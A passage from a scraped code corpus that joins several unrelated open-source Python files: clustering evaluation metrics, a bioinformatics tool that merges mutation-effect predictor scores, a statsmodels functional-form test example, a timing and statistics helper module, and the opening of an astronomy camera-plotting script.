    L. Hubert and P. Arabie, Comparing Partitions,
    Journal of Classification, 1985.

    See also
    --------
    adjusted_mutual_info_score: Adjusted Mutual Information
    """
    labels_true, labels_pred = check_clusterings(labels_true, labels_pred)
    n_samples = labels_true.shape[0]
    n_classes = np.unique(labels_true).shape[0]
    n_clusters = np.unique(labels_pred).shape[0]

    # Special limit cases: no clustering since the data is not split, or a
    # trivial clustering with one cluster per sample.  These are perfect
    # matches, hence return 1.0.
    if (n_classes == n_clusters == 1
            or n_classes == n_clusters == 0
            or n_classes == n_clusters == len(labels_true)):
        return 1.0

    contingency = contingency_matrix(labels_true, labels_pred)

    # Pair counts per true class, per predicted cluster and per cell.
    row_pairs = sum(comb2(n_c) for n_c in contingency.sum(axis=1))
    col_pairs = sum(comb2(n_k) for n_k in contingency.sum(axis=0))
    cell_pairs = sum(comb2(n_ij) for n_ij in contingency.flatten())

    expected_index = (row_pairs * col_pairs) / float(comb(n_samples, 2))
    max_index = (row_pairs + col_pairs) / 2.
    return (cell_pairs - expected_index) / (max_index - expected_index)
def homogeneity_completeness_v_measure(labels_true, labels_pred):
    """Compute the homogeneity, completeness and V-Measure scores at once.

    Homogeneity: each cluster contains only members of a single class.
    Completeness: all members of a given class are assigned to the same
    cluster.  Both are normalized conditional-entropy measures in
    [0, 1], larger being better, and are invariant under permutation of the
    label values.  V-Measure is the harmonic mean of the two and is
    symmetric; homogeneity and completeness are not.

    Parameters
    ----------
    labels_true : int array, shape = [n_samples]
        Ground truth class labels to be used as a reference.
    labels_pred : array, shape = [n_samples]
        Cluster labels to evaluate.

    Returns
    -------
    homogeneity : float
        Score between 0.0 and 1.0; 1.0 is perfectly homogeneous.
    completeness : float
        Score between 0.0 and 1.0; 1.0 is perfectly complete.
    v_measure : float
        Harmonic mean of the first two.

    See also
    --------
    homogeneity_score
    completeness_score
    v_measure_score
    """
    labels_true, labels_pred = check_clusterings(labels_true, labels_pred)

    # An empty labeling is a perfect (vacuous) match.
    if len(labels_true) == 0:
        return 1.0, 1.0, 1.0

    entropy_C = entropy(labels_true)
    entropy_K = entropy(labels_pred)
    mi = mutual_info_score(labels_true, labels_pred)

    # Guard against division by zero when a labeling carries no information.
    homogeneity = mi / entropy_C if entropy_C else 1.0
    completeness = mi / entropy_K if entropy_K else 1.0

    if homogeneity + completeness == 0.0:
        v_measure = 0.0
    else:
        v_measure = (2.0 * homogeneity * completeness
                     / (homogeneity + completeness))
    return homogeneity, completeness, v_measure
def homogeneity_score(labels_true, labels_pred):
    """Homogeneity metric of a cluster labeling given a ground truth.

    A clustering satisfies homogeneity if each of its clusters contains only
    data points that are members of a single class.  The score is in
    [0, 1], 1.0 standing for a perfectly homogeneous labeling, and is
    invariant under permutation of the label values.  It is not symmetric:
    swapping the arguments yields :func:`completeness_score`.

    Parameters
    ----------
    labels_true : int array, shape = [n_samples]
        Ground truth class labels to be used as a reference.
    labels_pred : array, shape = [n_samples]
        Cluster labels to evaluate.

    Returns
    -------
    homogeneity : float
        Score between 0.0 and 1.0; 1.0 stands for perfectly homogeneous.

    References
    ----------
    Rosenberg & Hirschberg (2007), "V-Measure: A conditional entropy-based
    external cluster evaluation measure".

    See also
    --------
    completeness_score
    v_measure_score
    """
    homogeneity, _, _ = homogeneity_completeness_v_measure(labels_true,
                                                           labels_pred)
    return homogeneity
def completeness_score(labels_true, labels_pred):
    """Completeness metric of a cluster labeling given a ground truth.

    A clustering satisfies completeness if all data points that are members
    of a given class are assigned to the same cluster.  The score is in
    [0, 1], 1.0 standing for a perfectly complete labeling, and is invariant
    under permutation of the label values.  It is not symmetric: swapping
    the arguments yields :func:`homogeneity_score`.

    Parameters
    ----------
    labels_true : int array, shape = [n_samples]
        Ground truth class labels to be used as a reference.
    labels_pred : array, shape = [n_samples]
        Cluster labels to evaluate.

    Returns
    -------
    completeness : float
        Score between 0.0 and 1.0; 1.0 stands for perfectly complete.

    References
    ----------
    Rosenberg & Hirschberg (2007), "V-Measure: A conditional entropy-based
    external cluster evaluation measure".

    See also
    --------
    homogeneity_score
    v_measure_score
    """
    _, completeness, _ = homogeneity_completeness_v_measure(labels_true,
                                                            labels_pred)
    return completeness
def v_measure_score(labels_true, labels_pred):
    """V-measure cluster labeling given a ground truth.

    The V-measure is the harmonic mean of homogeneity and completeness::

        v = 2 * (homogeneity * completeness) / (homogeneity + completeness)

    This score is identical to :func:`normalized_mutual_info_score`.  It is
    invariant under permutation of the label values and symmetric in its
    arguments, which makes it suitable for comparing two independent label
    assignments on the same data when the true ground truth is unknown.

    Parameters
    ----------
    labels_true : int array, shape = [n_samples]
        Ground truth class labels to be used as a reference.
    labels_pred : array, shape = [n_samples]
        Cluster labels to evaluate.

    Returns
    -------
    v_measure : float
        Score between 0.0 and 1.0; 1.0 stands for a perfectly complete and
        homogeneous labeling.

    References
    ----------
    Rosenberg & Hirschberg (2007), "V-Measure: A conditional entropy-based
    external cluster evaluation measure".

    See also
    --------
    homogeneity_score
    completeness_score
    """
    _, _, v_measure = homogeneity_completeness_v_measure(labels_true,
                                                         labels_pred)
    return v_measure
def mutual_info_score(labels_true, labels_pred, contingency=None):
    """Mutual Information between two clusterings.

    With :math:`P(i)` the probability of a sample falling in cluster
    :math:`U_i` and :math:`P'(j)` the probability of falling in cluster
    :math:`V_j`:

    .. math::

        MI(U,V) = \\sum_{i=1}^R \\sum_{j=1}^C
                  P(i,j)\\log\\frac{P(i,j)}{P(i)P'(j)}

    The score is invariant under permutation of the label values and
    symmetric in its arguments.

    Parameters
    ----------
    labels_true : int array, shape = [n_samples]
        A clustering of the data into disjoint subsets.
    labels_pred : array, shape = [n_samples]
        A clustering of the data into disjoint subsets.
    contingency : None or array, shape = [n_classes_true, n_classes_pred]
        A contingency matrix given by the :func:`contingency_matrix`
        function. If ``None``, it is computed; otherwise the given value is
        used and ``labels_true``/``labels_pred`` are ignored.

    Returns
    -------
    mi : float
        Mutual information, a non-negative value.

    See also
    --------
    adjusted_mutual_info_score: Adjusted against chance Mutual Information
    normalized_mutual_info_score: Normalized Mutual Information
    """
    if contingency is None:
        labels_true, labels_pred = check_clusterings(labels_true, labels_pred)
        contingency = contingency_matrix(labels_true, labels_pred)
    contingency = np.array(contingency, dtype='float')
    total = np.sum(contingency)
    row_sums = np.sum(contingency, axis=1)
    col_sums = np.sum(contingency, axis=0)
    outer = np.outer(row_sums, col_sums)
    nonzero = contingency != 0.0
    # Normalized contingency over the non-empty cells only.
    cell = contingency[nonzero]
    log_cell = np.log(cell)
    cell /= total
    # log(a / b) is computed as log(a) - log(b) to limit precision loss.
    log_outer = (-np.log(outer[nonzero])
                 + log(row_sums.sum()) + log(col_sums.sum()))
    mi = cell * (log_cell - log(total)) + cell * log_outer
    return mi.sum()
def adjusted_mutual_info_score(labels_true, labels_pred):
    """Adjusted Mutual Information between two clusterings.

    AMI adjusts the Mutual Information for chance, accounting for the fact
    that MI is generally higher when there are more clusters regardless of
    actual shared information::

        AMI(U, V) = [MI(U, V) - E(MI(U, V))]
                    / [max(H(U), H(V)) - E(MI(U, V))]

    The score is invariant under permutation of the label values and
    symmetric in its arguments.  Note that it is an order of magnitude
    slower than, e.g., the Adjusted Rand Index.

    Parameters
    ----------
    labels_true : int array, shape = [n_samples]
        A clustering of the data into disjoint subsets.
    labels_pred : array, shape = [n_samples]
        A clustering of the data into disjoint subsets.

    Returns
    -------
    ami : float (upper-limited by 1.0)
        1.0 when the two partitions are identical (up to a permutation);
        random, independent partitions score around 0 on average and the
        value can be negative.

    References
    ----------
    Vinh, Epps and Bailey (2010), "Information Theoretic Measures for
    Clusterings Comparison: Variants, Properties, Normalization and
    Correction for Chance", JMLR.

    See also
    --------
    adjusted_rand_score: Adjusted Rand Index
    mutual_information_score: Mutual Information (not adjusted for chance)
    """
    labels_true, labels_pred = check_clusterings(labels_true, labels_pred)
    n_samples = labels_true.shape[0]
    n_classes = np.unique(labels_true).shape[0]
    n_clusters = np.unique(labels_pred).shape[0]

    # Special limit case: no clustering since the data is not split.
    # This is a perfect match, hence return 1.0.
    if (n_classes == n_clusters == 1
            or n_classes == n_clusters == 0):
        return 1.0

    contingency = contingency_matrix(labels_true, labels_pred)
    contingency = np.array(contingency, dtype='float')
    # MI for the two clusterings, its expected value under the permutation
    # model, and the entropies used for normalization.
    mi = mutual_info_score(labels_true, labels_pred, contingency=contingency)
    emi = expected_mutual_information(contingency, n_samples)
    h_true, h_pred = entropy(labels_true), entropy(labels_pred)
    return (mi - emi) / (max(h_true, h_pred) - emi)
def normalized_mutual_info_score(labels_true, labels_pred):
    """Normalized Mutual Information between two clusterings.

    NMI scales the Mutual Information to the range [0, 1] by dividing by
    ``sqrt(H(labels_true) * H(labels_pred))``.  It is not adjusted for
    chance, so :func:`adjusted_mutual_info_score` might be preferred.  The
    score is invariant under permutation of the label values and symmetric
    in its arguments.

    Parameters
    ----------
    labels_true : int array, shape = [n_samples]
        A clustering of the data into disjoint subsets.
    labels_pred : array, shape = [n_samples]
        A clustering of the data into disjoint subsets.

    Returns
    -------
    nmi : float
        Score between 0.0 and 1.0; 1.0 stands for a perfectly complete
        labeling.

    See also
    --------
    adjusted_rand_score: Adjusted Rand Index
    adjusted_mutual_info_score: Adjusted Mutual Information (adjusted
        against chance)
    """
    labels_true, labels_pred = check_clusterings(labels_true, labels_pred)
    n_classes = np.unique(labels_true).shape[0]
    n_clusters = np.unique(labels_pred).shape[0]

    # Special limit case: no clustering since the data is not split.
    # This is a perfect match, hence return 1.0.
    if (n_classes == n_clusters == 1
            or n_classes == n_clusters == 0):
        return 1.0

    contingency = contingency_matrix(labels_true, labels_pred)
    contingency = np.array(contingency, dtype='float')
    mi = mutual_info_score(labels_true, labels_pred, contingency=contingency)
    h_true, h_pred = entropy(labels_true), entropy(labels_pred)
    # The max() guards against division by (near-)zero entropies.
    return mi / max(np.sqrt(h_true * h_pred), 1e-10)
def entropy(labels):
    """Calculate the entropy for a labeling.

    Parameters
    ----------
    labels : array-like
        Cluster labels.

    Returns
    -------
    entropy : float
        Shannon entropy (natural log) of the label distribution.  Returns
        1.0 for an empty labeling, matching the limit-case convention used
        by the callers in this module.
    """
    if len(labels) == 0:
        return 1.0
    label_idx = np.unique(labels, return_inverse=True)[1]
    # BUG FIX: ``np.float`` was a deprecated alias of the builtin ``float``
    # and has been removed in NumPy >= 1.24; use ``float`` directly.
    pi = bincount(label_idx).astype(float)
    pi = pi[pi > 0]
    pi_sum = np.sum(pi)
    # log(a / b) should be calculated as log(a) - log(b) for
    # possible loss of precision
    return -np.sum((pi / pi_sum) * (np.log(pi) - log(pi_sum)))
| bsd-3-clause |
fw1121/galaxy_tools | driver_to_inchlib/driver_to_inchlib.py | 2 | 4327 | #!/usr/bin/env python
import sys
import argparse
import pandas
# Column indices to extract from each predictor's tab-separated output file.
# NOTE(review): "polyphen" maps to an empty column list, so no PolyPhen
# columns are ever selected -- confirm the intended column indices.
MAPPINGS={"ma": [ 8], "sift": [10,14], "polyphen" : []}
# Predictor names handled by this script.
keys = ["sift", "ma", "polyphen"]
def stop_err(msg, err=1):
    """Write *msg* (newline-terminated) to stderr, then exit with status *err*."""
    message = '%s\n' % msg
    sys.stderr.write(message)
    sys.exit(err)
def main_web(args):
    """Merge mutation-effect predictor outputs (SIFT/Provean,
    MutationAssessor, PolyPhen) into one CSV matrix plus a metadata CSV.

    ``args`` is the (namespace, remaining) pair returned by
    ``ArgumentParser.parse_known_args()``; unrecognised extra parameters
    abort the run.  At least two inputs must be supplied, and the
    MutationAssessor file is required because it provides the row
    annotations.
    """
    # Any unrecognised command-line parameters are an error.
    if args[1]:
        print(args[1])
        stop_err("Unknown parameters")
    var = vars(args[0])
    params = [x for x in var if var[x] is not None]
    if len(params) < 2:
        stop_err("Need atleast two data to merge")

    # Load the requested predictor files, keeping only the score columns
    # configured in MAPPINGS.
    data = {"ma_input": None, "sift_input": None, "polyphen_input": None}
    annotations = None
    if var['sift_input']:
        data["sift_input"] = pandas.read_csv(var['sift_input'], delimiter='\t')[MAPPINGS["sift"]]
    if var['polyphen_input']:
        # BUG FIX: the PolyPhen file was previously never loaded, although
        # later joins referenced it.
        data["polyphen_input"] = pandas.read_csv(var['polyphen_input'], delimiter='\t')[MAPPINGS["polyphen"]]
    if var['ma_input']:
        # The MutationAssessor file also provides the row annotations.
        annotations = pandas.read_csv(var['ma_input'], delimiter='\t')[[1]]
        data["ma_input"] = pandas.read_csv(var['ma_input'], delimiter='\t')[MAPPINGS["ma"]]
    if annotations is None:
        # BUG FIX: annotations was referenced unconditionally below and
        # raised a NameError when --ma_input was not supplied.
        stop_err("Need MutationAssessor input for annotations")

    # BUG FIX: the original joined the *file path strings* (var[...]) in
    # some branches, joined the MA frame with itself, and could run two
    # branches in a row; build the merged frame from the loaded data once.
    frames = []
    columns = []
    if data["sift_input"] is not None:
        frames.append(data["sift_input"])
        columns += ['Provean', 'Sift']
    if data["ma_input"] is not None:
        frames.append(data["ma_input"])
        columns += ['MA']
    if data["polyphen_input"] is not None:
        frames.append(data["polyphen_input"])
        columns += ['Polyphen']
    merge_df = frames[0]
    for frame in frames[1:]:
        merge_df = merge_df.join(frame)
    merge_df.columns = columns

    # Drop incomplete rows and derive the class labels from the second
    # comma-separated field of each annotation.
    merge_df.insert(0, 'annotations', annotations)
    merge_df = merge_df.dropna()
    annotations = merge_df["annotations"]
    classes = pandas.Series([x.split(",")[1] for x in annotations])
    del(merge_df["annotations"])
    i = pandas.Series(merge_df.index)
    metadata_df = pandas.concat([i, classes], axis=1)

    if var["treat_binary"]:
        # Mark mutations as damaging (True) when the score crosses the
        # predictor-specific threshold.
        if data["sift_input"] is not None:
            merge_df["Sift"] = merge_df["Sift"] <= var["sift_threshold"]
            merge_df["Provean"] = merge_df["Provean"] <= var["provean_threshold"]
        if data["polyphen_input"] is not None:
            # BUG FIX: the original thresholded the Sift column here.
            merge_df["Polyphen"] = merge_df["Polyphen"] >= var["polyphen_threshold"]
        if data["ma_input"] is not None:
            merge_df["MA"] = merge_df["MA"] >= var["ma_threshold"]
        merge_df = merge_df.astype(int)

    merge_df.insert(0, 'annotations', merge_df.index)
    metadata_df.columns = ['annotations', 'class']
    merge_df.to_csv(var["output"], index=False)
    metadata_df.to_csv(var["metadata"], index=False)
# Command-line interface: collect predictor file paths / thresholds and
# forward the parsed arguments to main_web().
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="Process input output paths")
    parser.add_argument('--sift_input',
                        type=str,
                        help='SIFT/Provean input file location')
    parser.add_argument('--sift_threshold',
                        type=float,
                        help='SIFT threshold')
    parser.add_argument('--provean_threshold',
                        type=float,
                        help='Provean threshold')
    # BUG FIX: --polyphen_input is a file path, not a float.
    parser.add_argument('--polyphen_input',
                        type=str,
                        help='PolyPhen input file location')
    parser.add_argument('--polyphen_threshold',
                        type=float,
                        help='PolyPhen threshold')
    parser.add_argument('--ma_input',
                        type=str,
                        help='MutationAssessor input file location')
    parser.add_argument('--ma_threshold',
                        type=float,
                        help='MutationAssessor threshold')
    parser.add_argument('--treat-binary', action='store_true')
    parser.add_argument('--metadata',
                        type=str,
                        help='Metadata file location')
    parser.add_argument('--output',
                        type=str,
                        help='Output file location')
    args = parser.parse_known_args()
    main_web(args)
| mit |
hainm/statsmodels | statsmodels/examples/ex_kernel_test_functional.py | 34 | 2246 | # -*- coding: utf-8 -*-
"""
Created on Tue Jan 08 19:03:20 2013
Author: Josef Perktold
"""
from __future__ import print_function
# Example: functional-form specification test (TestFForm) for an OLS fit.
# A cubic data-generating process is simulated, a deliberately misspecified
# linear model is fit, and a kernel-based bootstrap test of the functional
# form is run.
if __name__ == '__main__':
    import numpy as np
    from statsmodels.regression.linear_model import OLS
    #from statsmodels.nonparametric.api import KernelReg
    import statsmodels.sandbox.nonparametric.kernel_extras as smke
    # Draw and print a fresh seed so a run can be reproduced later.
    seed = np.random.randint(999999)
    #seed = 661176
    print(seed)
    np.random.seed(seed)
    sig_e = 0.5 #0.1
    nobs, k_vars = 200, 1
    x = np.random.uniform(-2, 2, size=(nobs, k_vars))
    x.sort()
    # Polynomial DGP of degree ``order``; the fitted model below only uses
    # the constant and linear terms (exog[:, :2]).
    order = 3
    exog = x**np.arange(order + 1)
    beta = np.array([1, 1, 0.1, 0.0])[:order+1] # 1. / np.arange(1, order + 2)
    y_true = np.dot(exog, beta)
    y = y_true + sig_e * np.random.normal(size=nobs)
    endog = y
    print('DGP')
    print('nobs=%d, beta=%r, sig_e=%3.1f' % (nobs, beta, sig_e))
    mod_ols = OLS(endog, exog[:,:2])
    res_ols = mod_ols.fit()
    # Bootstrap test of the linear functional form with fixed bandwidths.
    #'cv_ls'[1000, 0.5][0.01, 0.45]
    tst = smke.TestFForm(endog, exog[:,:2], bw=[0.01, 0.45], var_type='cc',
                         fform=lambda x,p: mod_ols.predict(p,x),
                         estimator=lambda y,x: OLS(y,x).fit().params,
                         nboot=1000)
    print('bw', tst.bw)
    print('tst.test_stat', tst.test_stat)
    print(tst.sig)
    print('tst.boots_results mean, min, max', (tst.boots_results.mean(),
                                               tst.boots_results.min(),
                                               tst.boots_results.max()))
    print('lower tail bootstrap p-value', (tst.boots_results < tst.test_stat).mean())
    print('upper tail bootstrap p-value', (tst.boots_results >= tst.test_stat).mean())
    from scipy import stats
    print('aymp.normal p-value (2-sided)', stats.norm.sf(np.abs(tst.test_stat))*2)
    print('aymp.normal p-value (upper)', stats.norm.sf(tst.test_stat))
    # Visual check: scatter of the data with the (misspecified) OLS fit,
    # plus a histogram of the bootstrap distribution of the test statistic.
    do_plot=True
    if do_plot:
        import matplotlib.pyplot as plt
        plt.figure()
        plt.plot(x, y, '.')
        plt.plot(x, res_ols.fittedvalues)
        plt.title('OLS fit')
        plt.figure()
        plt.hist(tst.boots_results.ravel(), bins=20)
        plt.title('bootstrap histogram or test statistic')
        plt.show()
| bsd-3-clause |
CityPulse/CP_Resourcemanagement | virtualisation/misc/stats.py | 1 | 11883 | '''
Created on 19 Oct 2015
@author: thiggena
'''
from collections import OrderedDict
import csv
import datetime
from matplotlib import pyplot
from virtualisation.misc.buffer import NumericRingBuffer
from virtualisation.misc.jsonobject import JSONObject
PATH = "./"
BUFFER_SIZE = 1000
class Element(object):
    """Base class for a named statistics element."""

    def __init__(self, name):
        """Remember the element's display name."""
        self.name = name

    def finish(self):
        """Return a one-line, human-readable summary of this element."""
        return "".join(["Name: ", self.name])
class TimeElement(Element):
    """Statistics element that records elapsed wall-clock durations.

    Durations (in seconds) are accumulated in a fixed-size ring buffer.
    ``value`` zero-samples can be pre-filled so that an element created
    late stays aligned with siblings that already collected samples.
    """
    def __init__(self, name, value=0):
        super(TimeElement, self).__init__(name)
        self.buffer = NumericRingBuffer(BUFFER_SIZE)
        # Pad with zeros so this element lines up with older siblings.
        [self.buffer.add(0) for _i in range(0, value)]
        # Timestamp of the running measurement, or None when stopped.
        self.startTime = None
    def started(self, test=False):
        # True while a measurement is running.
        # NOTE(review): the ``test`` argument is accepted but never used.
        if self.startTime:
            return True
        return False
    def start(self):
        # Begin a measurement; starting twice is reported, not an error.
        if self.startTime is None:
            self.startTime = datetime.datetime.now()
        else:
            print self.name, "already started!"
    def stop(self, stoptime):
        # Record the elapsed time since start() and reset the start mark.
        if self.startTime is not None:
            self.buffer.add((stoptime - self.startTime).total_seconds())
            self.startTime = None
        else:
            print "TimeElement", self.name, "already stopped"
    def finish(self):
        # Print and return the summary line; also prints the mean duration.
        print super(TimeElement, self).finish()
        print "Mean:", self.mean()
        return super(TimeElement, self).finish()
    def mean(self):
        """Mean of the buffered durations."""
        return self.buffer.mean()
    def sum(self):
        """Sum of the buffered durations."""
        return sum(self.buffer)
    def getData(self, name):
        """Return ``(name, buffer)`` for CSV export / aggregation."""
        return (name, self.buffer)
    def insertNotUsedValue(self, values=0):
        # Top up the buffer with zeros until it holds ``values`` samples,
        # keeping unused elements aligned with their siblings.
        for _i in range(0, (values-self.buffer.len())):
            self.buffer.add(0)
class TimeElementList(TimeElement):
    """Hierarchical time element: a measured duration plus named children.

    Categories such as ``"a.b.c"`` are modelled as nested
    TimeElementList instances; start/stop operations recurse down the
    dotted category path.
    """
    def __init__(self, name, value=0):
        super(TimeElementList, self).__init__(name, value)
        # Child name -> TimeElementList.
        self.timeElementMap = {}
    def getData(self, name):
        """Return the (name, buffer) tuples of all children plus our own."""
        dataList = []
        for element in self.timeElementMap:
            dataList.append(self.timeElementMap[element].getData(name + "." + element))
        dataList.append(super(TimeElementList, self).getData(name))
        return dataList
    def startElement(self,categoryList):
        # Start (creating if necessary) the child named by categoryList[0]
        # and recurse into the remaining path components.
        timeElementList = None
        if categoryList[0] in self.timeElementMap:
            timeElementList = self.timeElementMap[categoryList[0]]
        else:
            # New children are zero-padded to our current sample count so
            # their buffers stay aligned.
            timeElementList = TimeElementList(categoryList[0], self.buffer.len())
            timeElementList.start()
            self.timeElementMap[categoryList[0]] = timeElementList
        if not timeElementList.started():
            timeElementList.start()
        if len(categoryList) > 1:
            timeElementList.startElement(categoryList[1:])
    def stopElement(self, categoryList, stoptime):
        # Stop the child addressed by the dotted path; unknown paths are
        # silently ignored.
        if categoryList[0] in self.timeElementMap:
            timeElementList = self.timeElementMap[categoryList[0]]
            if len(categoryList) > 1:
                timeElementList.stopElement(categoryList[1:], stoptime)
            else:
                if timeElementList.started():
                    timeElementList.stop(stoptime)
    def start(self):
        super(TimeElementList, self).start()
    def stop(self, stoptime):
        # Stop ourselves, then force-stop any still-running children and
        # zero-pad children that were not used during this measurement.
        super(TimeElementList, self).stop(stoptime)
        [e.stop(stoptime) for e in self.timeElementMap.values() if e.started(True)]
        self.insertNotUsedValue(self.buffer.len())
    def insertNotUsedValue(self, values=0):
        super(TimeElementList, self).insertNotUsedValue(values)
        [e.insertNotUsedValue(values) for e in self.timeElementMap.values()]
    def finish(self):
        # Print our summary and recurse into every child.
        super(TimeElementList, self).finish()
        for e in self.timeElementMap:
            self.timeElementMap[e].finish()
#     def writeCSVFile(self, name):
#         data = self.getData(self.name)
#         tuples = []
#         for e in data:
#             self.parse(e, tuples)
#
#         csvfile = open(PATH + str(name) + "_" + str(self.name) + ".csv", 'w')
#         csvf = csv.writer(csvfile, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
#
#         header = []
#         maxEntries = 0
#         for e in tuples:
#             header.append(e[0])
#             maxEntries = max(maxEntries, e[1].len())
#         csvf.writerow(header)
#
#         for i in range(0, maxEntries):
#             row = []
#             for e in tuples:
#                 data = e[1]
#                 if data.len() >= i+1:
#                     row.append(data.items[i])
#                 else:
#                     row.append("")
#             csvf.writerow(row)
#         csvfile.close()
    def parse(self, data, tuples):
        """Flatten the nested lists produced by getData into ``tuples``."""
        if isinstance(data, list):
            for e in data:
                self.parse(e, tuples)
        else:
            tuples.append(data)
    def getAverageProcessingTimes(self):
        """Return a JSONObject tree of mean durations for this subtree."""
        job = JSONObject()
        job.name = self.name
        job.value = self.mean()
        if len(self.timeElementMap) > 0:
            job.values = []
            for element in self.timeElementMap:
                # Children with their own children recurse; leaves get a
                # flat name/value pair.
                if len(self.timeElementMap[element].timeElementMap) > 0:
                    job.values.append(self.timeElementMap[element].getAverageProcessingTimes())
                else:
                    job2 = JSONObject()
                    job2.name = element
                    job2.value = self.timeElementMap[element].mean()
                    job.values.append(job2)
        return job
class CounterElement(Element):
    """Monotonic event counter recording the running total per timestamp."""

    def __init__(self, name):
        """Create the counter with a zeroed total and an empty history."""
        super(CounterElement, self).__init__(name)
        self.counter = 0
        # Maps timestamp -> cumulative count, in insertion order.
        self.counterMap = OrderedDict()

    def count(self, timestamp=None):
        """Increment the counter and record the new running total.

        The total is keyed by ``timestamp`` when a truthy one is given,
        otherwise by the current wall-clock time.
        """
        self.counter += 1
        key = timestamp if timestamp else datetime.datetime.now()
        self.counterMap[key] = self.counter
class SizeElement(Element):
    """Statistics element that tracks a size/value time series."""
    def __init__(self, name):
        super(SizeElement, self).__init__(name)
        # Maps timestamp -> observed value, in insertion order.
        self.items = OrderedDict()
    def addItem(self, time, value):
        """Record ``value`` under the given timestamp."""
        self.items[time] = value
    def finish(self):
        # Print the summary line followed by every recorded sample.
        print super(SizeElement, self).finish()
        for item in self.items:
            print item, self.items[item]
    def plot(self, name):
        """Plot the time series and save it as ``<PATH><name>_<self.name>.png``."""
        x = self.items.keys()
        y = self.items.values()
        pyplot.plot(x, y)
        print "x", x, min(x), max(x)
        print "y", y, min(y), max(y)
        pyplot.axis([min(x), max(x), min(y), max(y)])
        pyplot.savefig(PATH + name + "_" + self.name+ ".png")
    def getData(self, name):
        """Return ``(name, items)`` for export / aggregation."""
        return (name, self.items)
#     def writeCSVFile(self, name):
#         csvfile = open(PATH + name + "_" + self.name + "_size.csv", 'w')
#         csvf = csv.writer(csvfile, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
#         header = ["date", "value"]
#         csvf.writerow(header)
#         for element in self.items:
#             csvf.writerow([element, self.items[element]])
#         csvfile.close()
class Stats(object):
    """Named-singleton registry of statistics collectors.

    ``Stats(name)`` always returns the same underlying ``__Stats``
    instance for a given name (created on first use), so collectors can
    be shared across modules without explicit wiring.
    """
    # Global name -> __Stats registry shared by all callers.
    instances = {}
    def __new__(cls, name):
        # Singleton-per-name: construction returns the registry entry,
        # creating it on first use.
        if name not in Stats.instances:
            Stats.instances[name] = Stats.__Stats(name)
        return Stats.instances[name]
    @classmethod
    def getOrMake(cls, name):
        """Explicit alias for the get-or-create behaviour of ``__new__``."""
        if name not in Stats.instances:
            Stats.instances[name] = Stats.__Stats(name)
        return Stats.instances[name]
    @classmethod
    def getAllStats(cls):
        """Return all registered collector instances."""
        return Stats.instances.values()
    @classmethod
    def get(cls, name):
        """Return the collector registered under ``name``, or None."""
        if name in Stats.instances:
            return Stats.instances[name]
        return None
#     @classmethod
#     def writeCSVs(cls):
#         for e in Stats.instances.values():
#             e.writeCSVFiles()
    @classmethod
    def finish(cls):
        # NOTE(review): ``e`` iterates the registry *keys* (name strings),
        # so ``e.getvalue()`` looks like it would raise AttributeError —
        # confirm intent; possibly the values were meant to be iterated.
        jobs = JSONObject()
        jobs.stats = []
        for e in Stats.instances:
            job = JSONObject()
            job.name = e
            job.value = e.getvalue()
            jobs.stats.append(job)
        return jobs
    class __Stats(object):
        """The actual per-name collector of counter/size/time elements."""
        def __init__(self, name):
            self.name = name
            # Element name -> Element subclass instance.
            self.elements = {}
        def finish(self):
            # Print a summary of every element in this collector.
            print "Stats for", self.name
            for e in self.elements:
                self.elements[e].finish()
#         def writeCSVFiles(self):
#             for e in self.elements:
#                 self.elements[e].writeCSVFile(self.name)
        def addSize(self, name, time, value):
            """Record a size sample, creating the SizeElement on demand."""
            if name not in self.elements:
                element = SizeElement(name)
                self.elements[name] = element
            else:
                element = self.elements[name]
            element.addItem(time, value)
        def count(self, name, timestamp=None):
            """Increment a counter, creating the CounterElement on demand."""
            if name not in self.elements:
                element = CounterElement(name)
                self.elements[name] = element
            else:
                element = self.elements[name]
            element.count(timestamp)
        def startMeasurement(self, categoryString):
            """Start timing the dotted category, e.g. ``"method.if.test"``."""
            categories = categoryString.split(".")
            timeElementList = None
            if categories[0] in self.elements:
                timeElementList = self.elements[categories[0]]
            else:
                timeElementList = TimeElementList(categories[0])
                self.elements[categories[0]] = timeElementList
            if not timeElementList.started():
                timeElementList.start()
            if len(categories) > 1:
                timeElementList.startElement(categories[1:])
        def stopMeasurement(self, categoryString):
            """Stop timing the dotted category started by startMeasurement."""
            # Capture the stop time once so nested elements share it.
            stoptime = datetime.datetime.now()
            categories = categoryString.split(".")
            if categories[0] in self.elements:
                timeElementList = self.elements[categories[0]]
                if len(categories) > 1:
                    timeElementList.stopElement(categories[1:], stoptime)
                else:
                    if timeElementList.started():
                        timeElementList.stop(stoptime)
            else:
                print "cannot stop element", categories[0], ", related elements not stopped yet"
        def getAverageProcessingTimes(self):
            """Return JSONObject trees of mean durations for all time elements."""
            times = []
            for element in self.elements:
                if isinstance(self.elements[element], TimeElementList):
                    times.append(self.elements[element].getAverageProcessingTimes())
            return times
# if __name__ == '__main__':
# from time import sleep
# s = Stats("test")
# for i in range(0, 10):
# s.startMeasurement("method")
# # print i
# if i is 0:
# s.startMeasurement("method.if")
# sleep(0.0005)
# s.startMeasurement("method.if.test")
# sleep(0.0005)
# s.stopMeasurement("method.if.test")
# s.stopMeasurement("method.if")
#
# else:
# s.startMeasurement("method.else")
# sleep(0.0005)
# s.stopMeasurement("method.else")
# s.stopMeasurement("method")
# print s.getAverageProcessingTimes()[0].dumps()
# print "#####"
#
# s.writeCSVFiles()
| mit |
HSC-Users/hscTools | bick/bin/camPlot.py | 2 | 6927 | #!/usr/bin/env python
# Original filename: camPlot.py
#
# Author: Steve Bickerton
# Email:
# Date: Tue 2013-12-31 13:02:29
#
# Summary:
#
import sys
import os
import re
import math
import argparse
import numpy
import datetime
import matplotlib.figure as figure
from matplotlib.backends.backend_agg import FigureCanvasAgg as FigCanvas
import lsst.pex.policy as pexPolicy
import lsst.afw.cameraGeom as afwCG
import lsst.afw.cameraGeom.utils as afwCGU
import hsc.tools.bick.utils as hscUtil
#############################################################
#
# Main body of code
#
#############################################################
def main(infile, ccds=None, camera="hsc", cmap="copper", cols=[0,1],
         nsig=3.0, percent=False, textcolor='k', out=None):
    """Render per-CCD (or per-amp) values on a focal-plane layout image.

    infile   : text table with a CCD column and a value column (``cols``
               selects them; an optional third column selects the amp);
               when None, dummy values are rendered instead.
    ccds     : set of CCD ids to highlight; all others are zeroed.
    camera   : 'hsc' or 'sc' — selects the camera geometry policy file.
    cols     : column indices [ccd, value(, amp)].
               NOTE: mutable default is only read, never mutated.
    nsig     : color range is median +/- nsig * std.
